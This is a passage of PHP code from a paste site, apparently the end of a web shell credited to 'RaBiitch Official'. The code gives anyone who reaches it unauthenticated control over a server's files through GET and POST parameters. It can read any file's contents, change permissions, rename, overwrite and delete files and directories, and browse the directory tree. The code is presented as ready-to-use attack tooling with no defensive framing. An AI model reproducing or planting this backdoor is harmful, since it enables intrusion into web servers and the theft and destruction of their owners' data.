  4298. echo $_GET['filesrc'];
  4299. echo '</tr></td></table><br/>';
  4300. echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  4301. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  4302. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  4303. if($_POST['opt'] == 'chmod'){
  4304. if(isset($_POST['perm'])){
  4305. if(chmod($_POST['path'],$_POST['perm'])){
  4306. echo '<font color="green">Success !</font><br/>';
  4307. }else{
  4308. echo '<font color="red">Denied !</font><br />';
  4309. }
  4310. }
  4311. echo '<form method="POST">
  4312. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  4313. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4314. <input type="hidden" name="opt" value="chmod">
  4315. <input type="submit" value="Go" />
  4316. </form>';
  4317. }
  4318. elseif($_POST['opt'] == 'rename'){
  4319. if(isset($_POST['newname'])){
  4320. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  4321. echo '<font color="green">Success !</font><br/>';
  4322. }else{
  4323. echo '<font color="red">Denied !</font><br />';
  4324. }
  4325. $_POST['name'] = $_POST['newname'];
  4326. }
  4327. echo '<form method="POST">
  4328. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  4329. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4330. <input type="hidden" name="opt" value="rename">
  4331. <input type="submit" value="Go" />
  4332. </form>';
  4333. }elseif($_POST['opt'] == 'edit'){
  4334. if(isset($_POST['src'])){
  4335. $fp = fopen($_POST['path'],'w');
  4336. if(fwrite($fp,$_POST['src'])){
  4337. echo '<font color="green">Success !</font><br/>';
  4338. }else{
  4339. echo '<font color="red">Denied !</font><br/>';
  4340. }
  4341. fclose($fp);
  4342. }
  4343. echo '<form method="POST">
  4344. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  4345. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4346. <input type="hidden" name="opt" value="edit">
  4347. <input type="submit" value="Save" />
  4348. </form>';
  4349. }
  4350. echo '</center>';
  4351. }else{
  4352. echo '</table><br/><center>';
  4353. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  4354. if($_POST['type'] == 'dir'){
  4355. if(rmdir($_POST['path'])){
  4356. echo '<font color="green">Success !</font><br/>';
  4357. }else{
  4358. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  4359. }
  4360. }elseif($_POST['type'] == 'file'){
  4361. if(unlink($_POST['path'])){
  4362. echo '<font color="green">Success</font><br/>';
  4363. }else{
  4364. echo '<font color="red">Denied</font><br/>';
  4365. }
  4366. }
  4367. }
  4368. echo '</center>';
  4369. $scandir = scandir($path);
  4370. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  4371. <tr class="first">
  4372. <td><center>Name</center></td>
  4373. <td><center>Size</center></td>
  4374. <td><center>Permission</center></td>
  4375. <td><center>Action</center></td>
  4376. </tr>';
  4377.  
  4378. foreach($scandir as $dir){
  4379. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  4380. echo '<tr>
  4381. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  4382. <td><center>--</center></td>
  4383. <td><center>';
  4384. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  4385. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  4386. echo perms($path.'/'.$dir);
  4387. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  4388.  
  4389. echo '</center></td>
  4390. <td><center><form method="POST" action="?option&path='.$path.'">
  4391. <select name="opt">
  4392. <option value="">Select</option>
  4393. <option value="delete">Delete</option>
  4394. <option value="chmod">Chmod</option>
  4395. <option value="rename">Rename</option>
  4396. </select>
  4397. <input type="hidden" name="type" value="dir">
  4398. <input type="hidden" name="name" value="'.$dir.'">
  4399. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  4400. <input type="submit" value=">">
  4401. </form></center></td>
  4402. </tr>';
  4403. }
  4404. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  4405. foreach($scandir as $file){
  4406. if(!is_file($path.'/'.$file)) continue;
  4407. $size = filesize($path.'/'.$file)/1024;
  4408. $size = round($size,3);
  4409. if($size >= 1024){
  4410. $size = round($size/1024,2).' MB';
  4411. }else{
  4412. $size = $size.' KB';
  4413. }
  4414.  
  4415. echo '<tr>
  4416. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  4417. <td><center>'.$size.'</center></td>
  4418. <td><center>';
  4419. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  4420. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  4421. echo perms($path.'/'.$file);
  4422. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  4423. echo '</center></td>
  4424. <td><center><form method="POST" action="?option&path='.$path.'">
  4425. <select name="opt">
  4426. <option value="">Select</option>
  4427. <option value="delete">Delete</option>
  4428. <option value="chmod">Chmod</option>
  4429. <option value="rename">Rename</option>
  4430. <option value="edit">Edit</option>
  4431. </select>
  4432. <input type="hidden" name="type" value="file">
  4433. <input type="hidden" name="name" value="'.$file.'">
  4434. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  4435. <input type="submit" value=">">
  4436. </form></center></td>
  4437. </tr>';
  4438. }
  4439. echo '</table>
  4440. </div></div>';
  4441. }
  4442. echo '<center><br/>Copyright &copy '.date("Y").' <a href="https://www.rabiitch.ga/" target="_blank">RaBiitch Official</a></center>
  4443. </body>
  4444. </html>';
  4445. ?>
Add Comment
Please, Sign In to add comment